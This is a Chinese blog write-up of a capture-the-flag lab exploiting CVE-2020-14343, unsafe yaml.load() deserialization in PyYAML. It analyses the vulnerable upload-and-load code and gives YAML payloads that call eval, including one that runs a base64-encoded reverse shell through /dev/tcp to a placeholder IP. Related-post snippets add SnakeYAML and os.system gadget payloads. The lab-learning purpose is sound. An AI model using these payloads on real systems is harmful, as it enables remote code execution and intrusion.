【春秋云境】CVE-2020-14343 PyYAML中存在不安全的反序列化漏洞

已于 2024-03-26 10:21:14 修改
阅读量767 收藏 10
点赞数 8
分类专栏: 靶场WP 文章标签: 安全 数据库 python
于 2024-03-26 10:09:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HMX404/article/details/137033872
版权

PyYAML中存在不安全的反序列化漏洞。攻击者可利用该漏洞执行任意代码。

开启靶场

在这里插入图片描述

代码分析

反序列化位置

发现告诉你源代码位置了,下载源代码分析。

yaml.load() #将一个yaml文档反序列化为一个Python对象。

在这里插入图片描述

源代码修改过,但不影响实验。
可以看到在登录后,他会检测本地配置文件,然后进行反序列化。

配置文件上传位置

访问upload路径可以将文件保存到配置文件路径
在这里插入图片描述
代码判断为如果登录的IP和配置文件的IP一样则登录成功:
在这里插入图片描述
在本地测试,上传一下文件,hosts为本地测试地址(192.168.1.85),使用Admin用户名登录。(密码无判断)上传文件。
在这里插入图片描述

证明是可以通过文件上传修改配置文件的。
在这里插入图片描述
需要注意的是,使用网站上传时,他会自己再次访问默认路径
在这里插入图片描述
并且默认路径会自动重新修改配置文件。
在这里插入图片描述

漏洞验证

https://github.com/raul23/pyyaml-CVE-2020-14343
可以看到提供了3个POC。

!!python/object/new:tuple #YAML可以表示各种对象,包括Python对象。这里,它尝试序列化一个Python的tuple,其中包含一个map。
!!python/object/new:map  #这是YAML中用于指示创建一个新的Python对象的标签。
!!python/name:eval #这是指向Python的eval函数的引用。eval函数可以执行传入的字符串作为Python代码。
[ print('RCE EXPLOIT!') ] #这是一个Python代码字符串

执行成功
在这里插入图片描述
配置返连shell命令,构建新的payload
在这里插入图片描述

import('os').system(' ')  # python 执行系统函数


#上传问文件内容
 !!python/object/new:tuple [!!python/object/new:map [!!python/name:eval , [ "__import__('os').system('echo c2ggLWkgPiYgL2Rldi90Y3AvSVAvUE9SVCAwPiYx|base64 -d|bash')" ]]]

返连成功
在这里插入图片描述

获取flag

在这里插入图片描述

踩坑

1、本地复现时候,他提示参数有误。
yaml.load()报错 TypeError: load() missing 1 required positional argument: ‘Loader’ 解决方案
在这里插入图片描述

2、一开始使用pthon上线没有成功
在这里插入图片描述

参考文档

https://blog.csdn.net/chengdong996/article/details/123962061
https://github.com/raul23/pyyaml-CVE-2020-14343

PyYaml反序列化漏洞
snowlyzz的博客
05-08 1348
pyyaml 反序列化 简洁总结
yaml反序化漏洞本地环复现
11-23
yaml反序化漏洞本地环复现 CTF 比赛中yaml反序劣化payloads有个!!的限制,当时没搞出来,事后大神透露需要借助tag, 于是就有了这个资源文件
PyYaml反序列化漏洞详解
2302_76827504的博客
04-27 814
果listitems为空,则调用instance的extend()方法,将listitems中的所有元素添加到instance列表对象的末尾,instance是我们创建的实例,这里并没有定义listitems是什么,如果我们的listitems是一个字典,而且其内容有"{‘extend’:function}",这样的话,我们就可以利用extend进行任意函数的执行了。在这个方法中,data是一个包含YAML格式字符串的变量,可以是从文件中读取的字符串,也可以是用户输入的字符串等。ddd的值为666。
yaml反序列化
u013224189的专栏
11-23 2318
Yaml反序列化 payloads1: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:7800/yaml-payload.jar"] ]] ] payloads2: ​ 绕过 !! 的限制,如下: !可以用 tag:yaml.org,2002 表示。 !<tag:yaml.org,2002:javax.script.Scri
CTF-web: Python YAML反序列化利用
最新发布
weixin_59166557的博客
01-28 1198
PyYAML存在以下几个特殊标签,如果这些标签被安全的解析,会造成解析漏洞PyYaml 版本 6.0 开始,load的默认加载器已切换到 SafeLoader,以降低远程代码执行的风险。更新后易受攻击的是和。
【Web】浅浅地聊SnakeYaml反序列化两条常见利用链
uuzeray的博客
03-06 1823
②四种属性修饰,private,protected,public,default,若属性设置为public,则会调用对应的setter方法,当属性为public时,是通过反射对Field进行了set,而当属性为private时,是通过反射调用setName设置的值。首先看到javax.script.ScriptEngineManager的有参构造方法调用了init,并传入了一个ClassLoader,至于从哪传的,后面会讲,暂按下表。如果条件成立,则继续执行下面的逻辑,否则会返回一个表示空值的对象。
春秋 CVE-2022-4230 夺旗
05-02
### 春秋 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
近日XStream官方发布安全更新,修复了XStream 反序列化漏洞CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
weblogic反序列化漏洞测试工具python脚本
05-22
README.md中有具体使用方法,python脚本测试weblogic反序列化漏洞,测试前需要关闭T3协议
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
Pyyaml-yaml.load反序列化漏洞
huichen1233的博客
08-30 3430
YAML 是 “YAML Ain’t a Markup Language”(YAML 是一种标记语言)的递归缩写。在开发的这种语言时,YAML 的意思其实是:“Yet Another Markup Language”(仍是一种标记语言)。YAML 的语法和其他高级语言类似,并且可以简单表达清单、散列表,标量等数据形态。它使用空白符号缩进和大量依赖外观的特色,特别适合用来表达或编辑数据结构、各种配置文件、倾印调试内容、文件大纲(例如:许多电子邮件标题格式和YAML非常接近)。blog.yml。...
java使用jyaml序列化与反序列化yaml格式文件
tinysakura的博客
02-28 2292
转载自一缕阳光直射你的心扉的博客 maven 依赖 &amp;amp;amp;lt;project xmlns=&amp;amp;quot;http://maven.apache.org/POM/4.0.0&amp;amp;quot; xmlns:xsi=&amp;amp;quot;http://www.w3.org/2001/XMLSchema-instance&amp;amp;quot; xsi:schemaLocation=&amp;a
使用YAML进行序列化
weixin_33979363的博客
11-14 814
YAML=Yaml Ain't Markup Language 类似于xml但更优美 require"yaml"str="Hello World!"arr=%w{Jan Feb Mar Apr}ha={"this"=>"is","just a"=>"hash"}puts str.to_yamlputs arr.to_...
pyyaml反序列化漏洞
黑面狐
02-14 909
pyyaml在解析含有!!开头的数据会强制进行类型转换成字符串格式。 测试 import yaml yaml.load('!!python/object/apply:os.system ["date"]')   结果 poc还可以 !!python/object/apply:subprocess.check_output [[calc.exe]] !!python/object...
08-(RCE)命令及代码执行漏洞
qq_56414082的博客
03-28 1049
RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)分为远程命令执行ping和远程代码执行eval。
【网络安全】Nacos Client Yaml反序列化漏洞分析
HBohan的博客
10-15 6218
背景 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。 Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、原生范式) 的服务基础设施。 Nacos是阿里巴巴于2018年开源的项目,目前在Github中已获得 19.8kSt,由此可见其的使用广泛程度。 未授权访问漏洞 threedr3am师傅在去年十二月份的时候在Github上.
[Java反序列化]—SnakeYaml反序列化
Sentiment的博客
11-20 2352
SnakeYaml是一个完整的YAML1.1规范Processor,用于解析YAML,序列化以及反序列化,支持UTF-8/UTF-16,支持Java对象的序列化/反序列化,支持所有YAML定义的类型。题目中添加了添加authc拦截器,/admin/*的请求会被拦截,但存在绕过如/admin/*/后边加个斜杠"\",即可绕过,所以访问/admin/hello/即可。,首先获取要调用的类名也就是SPI1,通过反射获取该类,接着通过newInstance进行实例化,并retrun返回。
春秋CVE-2023-33440
01-12
### 关于春秋 CVE-2023-33440 漏洞详情 对于CVE-2023-33440,在当前提供的参考资料中并未直接提及此特定编号的漏洞细节。然而,基于以往处理类似安全事件的经验以及Apache Struts项目的安全公告模式[^1],可以推测这类CVE通常涉及Web应用程序框架中存在的某种形式的安全缺陷。 针对未具体说明的CVE编号,建议采取以下通用措施来应对潜在风险: #### 一、漏洞影响范围 此类漏洞可能会影响使用了受影响版本组件的应用程序,特别是那些依赖于特定功能实现的部分。例如,在之前的案例中提到的同类型的Struts2漏洞均涉及到同场景下的远程代码执行可能性或文件操作当等问题[^2][^3][^4]。 #### 二、修复方案概述 为了有效缓解并最终解决由CVE-2023-33440引起的风险,应当遵循官方发布的最新指南进行更新或打补丁。一般情况下,这包括但限于以下几个方面: - **及时升级软件**:确保所使用的Apache Struts库是最新的稳定版。 - **审查现有配置**:检查应用服务器上的所有设置是否符合最佳实践标准,尤其是与安全性有关的部分。 - **强化输入验证机制**:加强对用户提交数据的有效性和合法性校验,防止恶意构造的数据触发漏洞- **监控异常行为**:部署日志审计工具和服务端防护产品,以便快速发现任何可疑活动。 由于缺乏具体的漏洞描述和技术分析文档作为依据,上述内容仅能作为一个大致方向指导。强烈推荐查阅来自权威渠道的第一手资料获取最准确的信息。 ```bash # 假设存在一个命令用于查询最新的安全通告 curl https://struts.apache.org/security.html | grep "CVE-2023-33440" ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值